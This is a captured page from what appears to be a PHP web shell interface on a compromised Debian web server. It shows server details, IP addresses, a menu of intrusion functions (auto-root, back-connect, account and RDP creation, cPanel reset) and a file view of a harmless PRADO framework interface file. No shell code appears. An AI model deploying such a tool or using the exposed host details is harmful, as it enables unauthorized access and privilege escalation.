Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 52.15.92.58
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
framework /
Data /
SqlMap /
Statements /
[ HOME SHELL ]
Name
Size
Permission
Action
IMappedStatement.php
2.73
KB
-rw-r--r--
TCachingStatement.php
2.96
KB
-rw-r--r--
TDeleteMappedStatement.php
488
B
-rw-r--r--
TInsertMappedStatement.php
1.29
KB
-rw-r--r--
TMappedStatement.php
35.46
KB
-rw-r--r--
TPreparedCommand.php
2.08
KB
-rw-r--r--
TPreparedStatement.php
1.5
KB
-rw-r--r--
TPreparedStatementFactory.php
1.17
KB
-rw-r--r--
TSelectMappedStatement.php
822
B
-rw-r--r--
TSimpleDynamicSql.php
866
B
-rw-r--r--
TStaticSql.php
758
B
-rw-r--r--
TUpdateMappedStatement.php
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IMappedStatement.php
<?php /** * IMappedStatement interface file. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @package System.Data.SqlMap.Statements */ /** * Interface for all mapping statements. * * @author Wei Zhuo <weizho[at]gmail[dot]com> * @package System.Data.SqlMap.Statements * @since 3.1 */ interface IMappedStatement { /** * @return string Name used to identify the MappedStatement amongst the others. */ public function getID(); /** * @return TSqlMapStatement The SQL statment used by this TMappedStatement. */ public function getStatement(); /** * @return TSqlMap The TSqlMap used by this TMappedStatement */ public function getManager(); /** * Executes the SQL and retuns all rows selected in a map that is keyed on * the property named in the <tt>$keyProperty</tt> parameter. The value at * each key will be the value of the property specified in the * <tt>$valueProperty</tt> parameter. If <tt>$valueProperty</tt> is * <tt>null</tt>, the entire result object will be entered. * @param IDbConnection database connection to execute the query * @param mixed The object used to set the parameters in the SQL. * @param string The property of the result object to be used as the key. * @param string The property of the result object to be used as the value (or null) * @return TMap A map of object containing the rows keyed by <tt>$keyProperty</tt>. */ public function executeQueryForMap($connection, $parameter, $keyProperty, $valueProperty=null); /** * Execute an update statement. Also used for delete statement. Return the * number of row effected. * @param IDbConnection database connection to execute the query * @param mixed The object used to set the parameters in the SQL. * @return integer The number of row effected. */ public function executeUpdate($connection, $parameter); /** * Executes the SQL and retuns a subset of the rows selected. * @param IDbConnection database connection to execute the query * @param mixed The object used to set the parameters in the SQL. * @param TList A list to populate the result with. * @param integer The number of rows to skip over. * @param integer The maximum number of rows to return. * @return TList A TList of result objects. */ public function executeQueryForList($connection, $parameter, $result=null, $skip=-1, $max=-1); /** * Executes an SQL statement that returns a single row as an object * of the type of the <tt>$result</tt> passed in as a parameter. * @param IDbConnection database connection to execute the query * @param mixed The object used to set the parameters in the SQL. * @param object The result object. * @return object result. */ public function executeQueryForObject($connection,$parameter, $result=null); }
Close